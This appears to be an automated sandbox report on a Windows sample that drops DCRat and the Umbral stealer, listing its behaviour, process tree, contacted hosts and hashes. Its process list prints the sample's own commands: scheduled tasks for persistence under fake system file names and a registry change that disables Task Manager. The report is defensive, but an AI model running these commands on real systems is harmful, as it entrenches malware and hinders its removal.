Malware Analysis Report

2024-10-10 10:09

Sample ID 240505-bvm8bade58
Target 898a94f29edc228ce3bd2054f3d5d6dd.bin
SHA256 4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7
Tags
dcrat umbral evasion infostealer rat stealer execution spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7

Threat Level: Known bad

The file 898a94f29edc228ce3bd2054f3d5d6dd.bin was found to be: Known bad.

Malicious Activity Summary

dcrat umbral evasion infostealer rat stealer execution spyware

Umbral

Detect Umbral payload

DcRat

Process spawned unexpected child process

DCRat payload

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Disables Task Manager via registry modification

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Creates scheduled task(s)

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Detects videocard installed

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-05 01:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-05 01:28

Reported

2024-05-05 01:30

Platform

win7-20240221-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables Task Manager via registry modification

evasion

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Mail\de-DE\56085415360792 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\inf\conhost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File opened for modification C:\Windows\inf\conhost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\inf\088424020bedd6 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
Token: SeDebugPrivilege N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2892 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2892 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2892 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2892 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2892 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2892 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2892 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2892 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2892 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2892 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2892 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2644 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2644 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2644 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2644 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2536 wrote to memory of 2984 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2984 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2984 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2984 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2984 wrote to memory of 1652 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2984 wrote to memory of 1652 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2984 wrote to memory of 1652 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2984 wrote to memory of 1652 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1652 wrote to memory of 768 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 1652 wrote to memory of 768 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 1652 wrote to memory of 768 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 2984 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2984 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2984 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2984 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 768 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 768 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 768 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 768 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\inf\conhost.exe
PID 768 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\inf\conhost.exe
PID 768 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\inf\conhost.exe
PID 2460 wrote to memory of 1096 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2460 wrote to memory of 1096 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2460 wrote to memory of 1096 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2460 wrote to memory of 1216 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2460 wrote to memory of 1216 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2460 wrote to memory of 1216 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 1096 wrote to memory of 3044 N/A C:\Windows\System32\WScript.exe C:\Windows\inf\conhost.exe
PID 1096 wrote to memory of 3044 N/A C:\Windows\System32\WScript.exe C:\Windows\inf\conhost.exe
PID 1096 wrote to memory of 3044 N/A C:\Windows\System32\WScript.exe C:\Windows\inf\conhost.exe
PID 3044 wrote to memory of 3060 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 3044 wrote to memory of 3060 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 3044 wrote to memory of 3060 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 3044 wrote to memory of 1144 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 3044 wrote to memory of 1144 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 3044 wrote to memory of 1144 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 3060 wrote to memory of 2504 N/A C:\Windows\System32\WScript.exe C:\Windows\inf\conhost.exe
PID 3060 wrote to memory of 2504 N/A C:\Windows\System32\WScript.exe C:\Windows\inf\conhost.exe
PID 3060 wrote to memory of 2504 N/A C:\Windows\System32\WScript.exe C:\Windows\inf\conhost.exe
PID 2504 wrote to memory of 2808 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2504 wrote to memory of 2808 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2504 wrote to memory of 2808 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2504 wrote to memory of 2856 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2504 wrote to memory of 2856 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2504 wrote to memory of 2856 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"

C:\Users\Admin\AppData\Local\Temp\stealer.exe

"C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"

C:\Users\Admin\AppData\Local\Temp\Inject.exe

"C:\Users\Admin\AppData\Local\Temp\Inject.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "

C:\MsWinsessiondllNet\driverBrokercommon.exe

"C:\MsWinsessiondllNet\driverBrokercommon.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\inf\conhost.exe

"C:\Windows\inf\conhost.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6244d727-ed45-43e8-ad89-3c478c88af5c.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5ac14dba-f1e7-43c2-8a6c-dda8c9a7323c.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5150883-ed23-4482-a854-c5a2a66d82ea.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b02fd538-2945-43e5-a920-0034d7675f77.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7714cb1-5e00-45fe-a1f0-ae5b007ec77b.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae17c003-b5fe-4f4f-be48-34d5b9eac8fe.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dd645dac-b7c5-44f9-a4a4-3ff1610dd827.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51387e81-ee66-446b-a46a-d0e3ed1d0595.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6139caac-670c-420e-a75c-fa399d21bd69.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\799571d0-feee-4ef0-a2bd-927a43a01780.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 a0947008.xsph.ru udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp

Files

memory/2892-0-0x0000000000400000-0x000000000084E000-memory.dmp

\Users\Admin\AppData\Local\Temp\stealer.exe

MD5 8cc1e7cf94fec9bc505ce7411aa28861
SHA1 08703de84f3db427c368f16c873664d78bd83264
SHA256 cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba
SHA512 fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

\Users\Admin\AppData\Local\Temp\чекер dc.exe

MD5 6216b6bef94c09a40bfa263809b1ae56
SHA1 a928120e65199c6aaae6c991aa0466f3f8b06020
